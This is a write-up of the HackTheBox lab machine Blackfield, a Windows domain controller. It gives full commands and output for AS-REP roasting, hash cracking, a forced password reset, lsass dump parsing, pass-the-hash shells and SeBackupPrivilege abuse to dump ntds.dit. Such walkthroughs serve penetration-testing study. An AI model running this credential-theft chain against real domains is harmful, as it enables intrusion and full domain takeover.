Blackfield is a Windows machine rated as difficult from HackTheBox, it is an Active Directory machine where a kerberoasting attack is performed and then some forensics is required in order to obtain a hash for initial access, then administrator access is obtained abusing SeBackupPrivilege.
Enumeration
Running nmap :
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
nmap -sC -sV 10.10.10.192
Nmap scan report for BLACKFIELD.local (10.10.10.192)
Host is up (0.21s latency).
Not shown: 993 filtered ports
PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-10-03 15:06:52Z)
135/tcp open msrpc Microsoft Windows RPC
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
As we can see it is an active directory machine.
We will use smbclient to enumerate samba shares :
1
2
3
4
5
6
7
8
9
10
smbclient -L 10.10.10.192
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
forensic Disk Forensic / Audit share.
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
profiles$ Disk
SYSVOL Disk Logon server share
Trying to list contents in the forensic share we get access denied :
1
2
3
smbclient \\\\10.10.10.192\\forensic
smb: \> dir
NT_STATUS_ACCESS_DENIED listing \*
Then, connecting to profiles$ gives a huge list of directories which seem to be usernames :
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
smbclient \\\\10.10.10.192\\profiles$
smb: \> dir
. D 0 Wed Jun 3 18:47:12 2020
.. D 0 Wed Jun 3 18:47:12 2020
AAlleni D 0 Wed Jun 3 18:47:11 2020
ABarteski D 0 Wed Jun 3 18:47:11 2020
ABekesz D 0 Wed Jun 3 18:47:11 2020
ABenzies D 0 Wed Jun 3 18:47:11 2020
ABiemiller D 0 Wed Jun 3 18:47:11 2020
AChampken D 0 Wed Jun 3 18:47:11 2020
ACheretei D 0 Wed Jun 3 18:47:11 2020
ACsonaki D 0 Wed Jun 3 18:47:11 2020
AHigchens D 0 Wed Jun 3 18:47:11 2020
AJaquemai D 0 Wed Jun 3 18:47:11 2020
AKlado D 0 Wed Jun 3 18:47:11 2020
AKoffenburger D 0 Wed Jun 3 18:47:11 2020
AKollolli D 0 Wed Jun 3 18:47:11 2020
AKruppe D 0 Wed Jun 3 18:47:11 2020
AKubale D 0 Wed Jun 3 18:47:11 2020
ALamerz D 0 Wed Jun 3 18:47:11 2020
AMaceldon D 0 Wed Jun 3 18:47:11 2020
AMasalunga D 0 Wed Jun 3 18:47:11 2020
ANavay D 0 Wed Jun 3 18:47:11 2020
ANesterova D 0 Wed Jun 3 18:47:11 2020
ANeusse D 0 Wed Jun 3 18:47:11 2020
AOkleshen D 0 Wed Jun 3 18:47:11 2020
APustulka D 0 Wed Jun 3 18:47:11 2020
ARotella D 0 Wed Jun 3 18:47:11 2020
ASanwardeker D 0 Wed Jun 3 18:47:11 2020
AShadaia D 0 Wed Jun 3 18:47:11 2020
ASischo D 0 Wed Jun 3 18:47:11 2020
ASpruce D 0 Wed Jun 3 18:47:11 2020
ATakach D 0 Wed Jun 3 18:47:11 2020
ATaueg D 0 Wed Jun 3 18:47:11 2020
ATwardowski D 0 Wed Jun 3 18:47:11 2020
audit2020 D 0 Wed Jun 3 18:47:11 2020
AWangenheim D 0 Wed Jun 3 18:47:11 2020
...
All the contents were copied to a userlist and then modified to delete the junk with the following bash command :
1
cat users.txt | awk '{print $1 > "text.txt"}'
Exploitation
Now that we have a user list, we can try to use GetNPUsers.py from impacket, performing a Keberoasting attack to see if we are able to get any TGT .
We already know the domain name from nmap scan : BLACKFIELD.local and we will generate the hash in john format to crack it later .
1
2
3
4
5
6
7
8
9
GetNPUsers.py BLACKFIELD.local/ -usersfile users.txt -format john -outputfile hashes.txt -dc-ip 10.10.10.192
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
After a while we check the hashes file and find a TGT for support :
1
2
cat hashes.txt
$krb5asrep$support@BLACKFIELD.LOCAL:971dafdacb7ef8b994fde97b1da3e9f7$37f9724cdd1f09f1055d9261954951229c7eb2f320512b823127431fbfc61c846c9743b554a9c5462ca86f542d78bdc265cdee806fd7fc33e05785d7b1d93d70d8835818e5eecf7923017ca53b5bbfc288c646c48f52b910286a67ed7d96ff64d4cf7a346d1ae919d7da2153d8fd1ee782e6f6750eb9497ad9eb6f7fe77fc97d924282d4533e7669b4b0f54765be92ad35570f41739821adae12d9ba225d6c6d14736f3b87328ac924809c3d446739232bc766aeea2366a44f40532eca09241c1672f0f11ac5641dbc87af954512553e856783bf62f377c3badce8e77aa56f0ff42fd40f99c68e17319065312ed35f5ed380c964
Now we can crack it with john :
1
2
3
john hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt
john --show hashes.txt
$krb5asrep$support@BLACKFIELD.LOCAL:#00^BlackKnight
With these credentials we can try to access rpcclient :
1
2
3
rpcclient 10.10.10.192 -U support
Enter WORKGROUP\support's password:
rpcclient $>
Enumerating users we find new ones such as audit2020 :
1
2
3
4
5
6
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[audit2020] rid:[0x44f]
user:[support] rid:[0x450]
We can also try to enumerate the privileges of support account to see if we can do something with them :
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
rpcclient $> enumprivs
found 35 privileges
SeCreateTokenPrivilege 0:2 (0x0:0x2)
SeAssignPrimaryTokenPrivilege 0:3 (0x0:0x3)
SeLockMemoryPrivilege 0:4 (0x0:0x4)
SeIncreaseQuotaPrivilege 0:5 (0x0:0x5)
SeMachineAccountPrivilege 0:6 (0x0:0x6)
SeTcbPrivilege 0:7 (0x0:0x7)
SeSecurityPrivilege 0:8 (0x0:0x8)
SeTakeOwnershipPrivilege 0:9 (0x0:0x9)
SeLoadDriverPrivilege 0:10 (0x0:0xa)
SeSystemProfilePrivilege 0:11 (0x0:0xb)
SeSystemtimePrivilege 0:12 (0x0:0xc)
SeProfileSingleProcessPrivilege 0:13 (0x0:0xd)
SeIncreaseBasePriorityPrivilege 0:14 (0x0:0xe)
SeCreatePagefilePrivilege 0:15 (0x0:0xf)
SeCreatePermanentPrivilege 0:16 (0x0:0x10)
SeBackupPrivilege 0:17 (0x0:0x11)
SeRestorePrivilege 0:18 (0x0:0x12)
SeShutdownPrivilege 0:19 (0x0:0x13)
SeDebugPrivilege 0:20 (0x0:0x14)
SeAuditPrivilege 0:21 (0x0:0x15)
SeSystemEnvironmentPrivilege 0:22 (0x0:0x16)
SeChangeNotifyPrivilege 0:23 (0x0:0x17)
SeRemoteShutdownPrivilege 0:24 (0x0:0x18)
SeUndockPrivilege 0:25 (0x0:0x19)
SeSyncAgentPrivilege 0:26 (0x0:0x1a)
SeEnableDelegationPrivilege 0:27 (0x0:0x1b)
SeManageVolumePrivilege 0:28 (0x0:0x1c)
SeImpersonatePrivilege 0:29 (0x0:0x1d)
SeCreateGlobalPrivilege 0:30 (0x0:0x1e)
SeTrustedCredManAccessPrivilege 0:31 (0x0:0x1f)
SeRelabelPrivilege 0:32 (0x0:0x20)
SeIncreaseWorkingSetPrivilege 0:33 (0x0:0x21)
SeTimeZonePrivilege 0:34 (0x0:0x22)
SeCreateSymbolicLinkPrivilege 0:35 (0x0:0x23)
SeDelegateSessionUserImpersonatePrivilege 0:36 (0x0:0x24)
As we see there are lots of privileges, after investigating for a while I found that user passwords could be changed from rpcclient, so I decided to try with audit2020 account and got succesful :
1
rpcclient $> setuserinfo2 audit2020 23 'N0xi0us'
Now with this account we can enumerate the contents of the forensic share :
1
2
3
4
5
6
7
8
smbclient -U audit2020 \\\\10.10.10.192\\forensic
Enter WORKGROUP\audit2020's password:
smb: \> dir
. D 0 Sun Feb 23 14:03:16 2020
.. D 0 Sun Feb 23 14:03:16 2020
commands_output D 0 Sun Feb 23 19:14:37 2020
memory_analysis D 0 Thu May 28 22:28:33 2020
tools
There, inside memory_analysis we find an interesting file belonging to Windows’s Local Security Authority Service :
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
smb: \memory_analysis\> dir
. D 0 Thu May 28 22:28:33 2020
.. D 0 Thu May 28 22:28:33 2020
conhost.zip A 37876530 Thu May 28 22:25:36 2020
ctfmon.zip A 24962333 Thu May 28 22:25:45 2020
dfsrs.zip A 23993305 Thu May 28 22:25:54 2020
dllhost.zip A 18366396 Thu May 28 22:26:04 2020
ismserv.zip A 8810157 Thu May 28 22:26:13 2020
lsass.zip A 41936098 Thu May 28 22:25:08 2020
mmc.zip A 64288607 Thu May 28 22:25:25 2020
RuntimeBroker.zip A 13332174 Thu May 28 22:26:24 2020
ServerManager.zip A 131983313 Thu May 28 22:26:49 2020
sihost.zip A 33141744 Thu May 28 22:27:00 2020
smartscreen.zip A 33756344 Thu May 28 22:27:11 2020
svchost.zip A 14408833 Thu May 28 22:27:19 2020
taskhostw.zip A 34631412 Thu May 28 22:27:30 2020
winlogon.zip A 14255089 Thu May 28 22:27:38 2020
wlms.zip A 4067425 Thu May 28 22:27:44 2020
WmiPrvSE.zip A 18303252 Thu May 28 22:27:53 2020
Trying to download it we get an error , so we can try to mount the directory in our machine :
1
2
3
4
5
smb: \memory_analysis\> get lsass.zip
Error opening local file lsass.zip
mount -t cifs //10.10.10.192/forensic/memory_analysis /mnt -o user=aud
it2020
🔐 Password for audit2020@//10.10.10.192/forensic/memory_analysis: *******
After unzipping it , we find it contains a memory dump file :
1
2
ls -l lsass.DMP
-rw-r--r-- 1 root root 143044222 Feb 23 2020 lsass.DMP
So according to this article we can use mimikatz to extract password hashes.
As we are in Linux we can use an alternative to mimikatz built with python called pypykatz.
We just need to modify a bit the mimikatz syntax and run it, as the output is so huge I will only show the relevant part :
1
2
3
4
5
pypykatz lsa minidump lsass.DMP
Username: svc_backup
Domain: BLACKFIELD
LM: NA
NT: 9658d1d1dcd9250115e2205d9f48400d
With this hash, we can abuse the pass-the-hash technique and obtain a shell using evil-winrm :
1
2
3
4
5
6
7
evil-winrm -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d -i 10.10.10.192
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_backup\Documents> whoami
blackfield\svc_backup
Privilege Escalation
Checking this account privileges we see the account has enabled SeBackupPrivilege :
1
2
3
4
5
6
7
8
9
10
11
12
13
*Evil-WinRM* PS C:\Users\svc_backup\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
With this privilege we have access to every file on the system, a more detailed explanation of this privilege can be found in this set of slides
We can get the admin hash by obtaining Windows’s registry file system and ntds.dit (database which stores AD information) and then using impacket secretsdump on them.
System file can be downloaded easily :
1
2
3
4
5
*Evil-WinRM* PS C:\Users\svc_backup\Documents> download system.hive
Info: Downloading C:\Users\svc_backup\Documents\system.hive to system.hive
Info: Download successful!
To obtain NTDS.dit we first need to use diskshadow to mount a shadow copy, in order to do that we will use the following script :
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
*Evil-WinRM* PS C:\tmp> upload script.txt
Info: Uploading script.txt to C:\tmp\script.txt
Data: 108 bytes of 108 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\tmp> diskshadow /s script.txt
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer: DC01, 10/3/2020 9:33:44 AM
-> set context persistent
-> add volume c: alias mydrive
-> create
Alias mydrive for shadow ID {69711bad-ca22-4576-94eb-daa71cc185be} set as environment variable.
Alias VSS_SHADOW_SET for shadow set ID {af8518f9-cee1-49d3-8b7e-553757aa0761} set as environment variable.
Querying all shadow copies with the shadow copy set ID {af8518f9-cee1-49d3-8b7e-553757aa0761}
* Shadow copy ID = {69711bad-ca22-4576-94eb-daa71cc185be} %mydrive%
- Shadow copy set: {af8518f9-cee1-49d3-8b7e-553757aa0761} %VSS_SHADOW_SET%
- Original count of shadow copies = 1
- Original volume name: \\?\Volume{351b4712-0000-0000-0000-602200000000}\ [C:\]
- Creation time: 10/3/2020 9:34:20 AM
- Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
- Originating machine: DC01.BLACKFIELD.local
- Service machine: DC01.BLACKFIELD.local
- Not exposed
- Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
- Attributes: No_Auto_Release Persistent Differential
Number of shadow copies listed: 1
-> expose %mydrive% z:
-> %mydrive% = {69711bad-ca22-4576-94eb-daa71cc185be}
The shadow copy was successfully exposed as z:\.
Now we need to upload and import two DLL to impersonate a backup software :
1
2
3
4
*Evil-WinRM* PS C:\tmp> upload SeBackupPrivilegeCmdLets.dll
*Evil-WinRM* PS C:\tmp> upload SeBackupPrivilegeUtils.dll
*Evil-WinRM* PS C:\tmp> Import-Module ./SeBackupPrivilegeCmdLets.dll
*Evil-WinRM* PS C:\tmp> Import-Module ./SeBackupPrivilegeUtils.dll
Then, we copy ntds.dit from the shadow copy to our temp directory and download it :
1
2
*Evil-WinRM* PS C:\tmp> Copy-FileSebackupPrivilege z:\Windows\NTDS\ntds.dit C:\tmp\ntds.dit
*Evil-WinRM* PS C:\tmp> download ntds.dit
Finally we use secretsdump to obtain the admin hash :
1
2
3
4
5
6
7
8
9
secretsdump.py -system system -ntds ntds.dit LOCAL
Impacket v0.9.22.dev1+20200728.230151.48a3124c - Copyright 2020 SecureAuth Corporation
[*] Target system bootKey: 0x73d83e56de8961ca9f243e1a49638393
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 35640a3fd5111b93cc50e3b4e255ff8c
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee:::
We can just obtain an admin shell using again pass-the-hash:
1
2
3
4
5
6
7
evil-winrm -i 10.10.10.192 -u Administrator -H 184fb5e5178480be64824d4cd53b99ee
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
blackfield\administrator